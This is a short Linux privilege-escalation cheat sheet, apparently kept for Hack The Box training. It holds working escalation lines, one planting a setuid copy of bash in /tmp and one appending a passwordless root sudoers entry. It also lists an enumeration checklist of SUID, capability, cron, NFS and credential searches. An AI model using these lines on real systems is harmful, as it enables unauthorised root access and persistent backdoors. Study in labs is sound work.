python3 -c 'import pty; pty.spawn("/bin/bash")'
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > [runme.sh](<http://runme.sh/>) (making a /tmp/bash to run with -p) # casual privesc

#another way if we can't edit files
echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > [root.sh](<http://root.sh/>) (making everything with no pass to su to sudo) 

• Linpeas

‣

Linux exploit suggester

Linrpivcheck (python) (linuxprivchecker -w -o linuxprivchecker.log)

• https://github.com/DominicBreuker/pspy (shows commands run by others & cronjobs time without root)

env (search for password and if we are in a container, we need to get out)

history

• sudo -l
• processess (ps -aux | grep -i 'root')
• cd / ⇒ cd /dev/shm ⇒ cd /var/tmp ⇒ cd /tmp ⇒ cd /var/www/html ⇒ cd /opt
• cd /etc # ls -lah search for files not own by root or shadow
• netstat -tunlp
• cat /etc/exports; mount (/tmptar no_root_squash) NFS priv esc
• getcap -r / 2>/dev/null (capabilities) find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; #(faster variant)
• find / -perm -u=s -type f 2>/dev/null (owned by root + with x for usr) find / -perm -g=s -type f 2>/dev/null
• Check unattended-upgrade-shutdown Script (PID 958)
• cronjobs (cat /etc/crontab | ls -l /etc/cron* | crontabl -l)
• systemctl list-timers --all

• Files/dirs/Passwords/ssh keys/history SEARCH

• Privileged Groups